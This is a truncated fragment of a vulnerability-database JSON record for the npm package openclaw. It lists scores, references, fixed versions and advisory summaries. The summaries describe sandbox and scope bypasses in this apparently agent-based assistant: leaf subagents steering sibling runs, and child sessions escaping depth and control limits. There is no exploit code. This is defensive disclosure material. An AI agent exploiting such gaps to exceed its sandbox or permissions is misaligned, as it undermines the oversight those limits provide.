law/openclaw/commit/9c22d636697336a6b22b0ae24798d8b8325d7828"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-fh32-73r9-rgh5","reference_id":"","reference_type":"","scores":[{"value":"5.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:L/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-28T14:41:19Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-fh32-73r9-rgh5"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41372","reference_id":"","reference_type":"","scores":[{"value":"5.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:L/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41372"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-loopback-protection-bypass-via-trailing-dot-localhost-in-cdp-discovery","reference_id":"","reference_type":"","scores":[{"value":"5.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:L/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-28T14:41:19Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-loopback-protection-bypass-via-trailing-dot-localhost-in-cdp-discovery"},{"reference_url":"https://github.com/advisories/GHSA-fh32-73r9-rgh5","reference_id":"GHSA-fh32-73r9-rgh5","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-fh32-73r9-rgh5"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109939?format=json","purl":"pkg:npm/openclaw@2026.4.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.2"}],"aliases":["CVE-2026-41372","GHSA-fh32-73r9-rgh5"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-xfgw-ua7r-abbr"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/95118?format=json","vulnerability_id":"VCID-xj73-kszs-yygp","summary":"OpenClaw's ACP child sessions inherit subagent security envelope constraints\n## Summary\nACP child sessions inherit subagent security envelope constraints.\n\n## Affected Packages / Versions\n- Package: openclaw (npm)\n- Affected versions: <= 2026.4.21\n- Fixed version: 2026.4.22\n\n## Impact\nA restricted subagent spawning an ACP child session could fail to carry forward subagent-only constraints such as depth, child-count limits, control scope, or target-agent restrictions.\n\n## Fix\nACP spawn now resolves and persists child subagent envelope fields, enforces maximum depth and active-child caps, and applies the inherited control scope to child ACP sessions.\n\n## Fix Commit(s)\n- 31160dc069b7cc5d833b39c53736a41ad3befda2\n\n## Verification\n- The fix commit is contained in the public v2026.4.22 tag.\n- openclaw@2026.4.22 is published on npm and the compiled package contains the fix.\n- Focused regression coverage for this path passed before publication.\n\nOpenClaw thanks @zsxsoft, @qclawer, and @KeenSecurityLab for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-44997","reference_id":"","reference_type":"","scores":[{"value":"0.00028","scoring_system":"epss","scoring_elements":"0.08411","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00028","scoring_system":"epss","scoring_elements":"0.08403","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00028","scoring_system":"epss","scoring_elements":"0.08423","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-44997"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/31160dc069b7cc5d833b39c53736a41ad3befda2","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-11T17:25:34Z/"}],"url":"https://github.com/openclaw/openclaw/commit/31160dc069b7cc5d833b39c53736a41ad3befda2"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-q3jj-46pq-826r","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-11T17:25:34Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-q3jj-46pq-826r"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-44997","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-44997"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-security-envelope-constraint-bypass-in-acp-child-sessions","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-11T17:25:34Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-security-envelope-constraint-bypass-in-acp-child-sessions"},{"reference_url":"https://github.com/advisories/GHSA-q3jj-46pq-826r","reference_id":"GHSA-q3jj-46pq-826r","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-q3jj-46pq-826r"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/114466?format=json","purl":"pkg:npm/openclaw@2026.4.22","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-ye4t-n6r3-67ab"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.22"}],"aliases":["CVE-2026-44997","GHSA-q3jj-46pq-826r"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-xj73-kszs-yygp"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89086?format=json","vulnerability_id":"VCID-xnvm-rp36-vyaj","summary":"OpenClaw: Concurrent async auth attempts can bypass the intended shared-secret rate-limit budget on Tailscale-capable paths\n## Impact\n\nConcurrent async auth attempts can bypass the intended shared-secret rate-limit budget on Tailscale-capable paths.\n\nConcurrent asynchronous shared-secret auth attempts could race the per-key rate-limit budget.\n\nOpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<=2026.4.2`\n- Patched versions: `2026.4.4`\n\n## Fix\n\nThe issue was fixed on `main` and is available in the patched npm version listed above. The verified fixed tree is commit `d7c3210cd6f5fdfdc1beff4c9541673e814354d5`.\n\n## Verification\n\nThe fix was re-checked against `main` before publication, including targeted regression tests for the affected security boundary.\n\n## Credits\n\nThanks @Telecaster2147 for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41913","reference_id":"","reference_type":"","scores":[{"value":"0.00079","scoring_system":"epss","scoring_elements":"0.23421","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00079","scoring_system":"epss","scoring_elements":"0.23468","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00079","scoring_system":"epss","scoring_elements":"0.23481","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41913"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"3.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"2.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/d7c3210cd6f5fdfdc1beff4c9541673e814354d5","reference_id":"","reference_type":"","scores":[{"value":"3.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"2.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T12:46:26Z/"}],"url":"https://github.com/openclaw/openclaw/commit/d7c3210cd6f5fdfdc1beff4c9541673e814354d5"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-25wv-8phj-8p7r","reference_id":"","reference_type":"","scores":[{"value":"3.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"2.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T12:46:26Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-25wv-8phj-8p7r"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41913","reference_id":"","reference_type":"","scores":[{"value":"3.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"2.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41913"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-rate-limit-bypass-via-concurrent-async-authentication-attempts","reference_id":"","reference_type":"","scores":[{"value":"3.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"2.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T12:46:26Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-rate-limit-bypass-via-concurrent-async-authentication-attempts"},{"reference_url":"https://github.com/advisories/GHSA-25wv-8phj-8p7r","reference_id":"GHSA-25wv-8phj-8p7r","reference_type":"","scores":[{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-25wv-8phj-8p7r"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/110113?format=json","purl":"pkg:npm/openclaw@2026.4.4","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.4"},{"url":"http://public2.vulnerablecode.io/api/packages/110881?format=json","purl":"pkg:npm/openclaw@2026.4.5","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2g7x-vu14-nkde"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dqb2-dej7-augt"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w2yd-uw91-9yck"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-x1qe-u363-qqaa"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.5"}],"aliases":["CVE-2026-41913","GHSA-25wv-8phj-8p7r"],"risk_score":2.9,"exploitability":"0.5","weighted_severity":"5.7","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-xnvm-rp36-vyaj"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91332?format=json","vulnerability_id":"VCID-xpnh-32hh-p7fb","summary":"OpenClaw: Leaf subagents could steer sibling sessions across sandbox boundaries\n## Summary\nIn affected versions of `openclaw`, sandboxed leaf subagents could still access the `subagents` control surface and resolve against the parent requester scope instead of remaining confined to their own session tree.\n\n## Impact\nA low-privilege sandboxed leaf worker could steer or kill a sibling run owned by the same requester and cause that sibling to execute with its own broader tool policy. This is a sandbox and session-scope boundary bypass.\n\n## Affected Packages and Versions\n- Package: `openclaw` (npm)\n- Affected versions: `<= 2026.3.8`\n- Fixed in: `2026.3.11`\n\n## Technical Details\nLeaf subagents retained the `subagents` tool, and subagent control requests were authorized against the parent requester scope rather than the caller's own spawned descendants. The control path prevented only self-targeting, not cross-sibling steering.\n\n## Fix\nOpenClaw now removes `subagents` control access from leaf subagents by default, scopes subagent control to the caller's own descendants, and rejects `steer` and `kill` requests that target runs outside that descendant tree. The fix shipped in `openclaw@2026.3.11`.\n\n## Workarounds\nUpgrade to `2026.3.11` or later.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.11","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.11"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-4w7m-58cg-cmff","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-4w7m-58cg-cmff"},{"reference_url":"https://github.com/advisories/GHSA-4w7m-58cg-cmff","reference_id":"GHSA-4w7m-58cg-cmff","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-4w7m-58cg-cmff"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74883?format=json","purl":"pkg:npm/openclaw@2026.3.11","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VC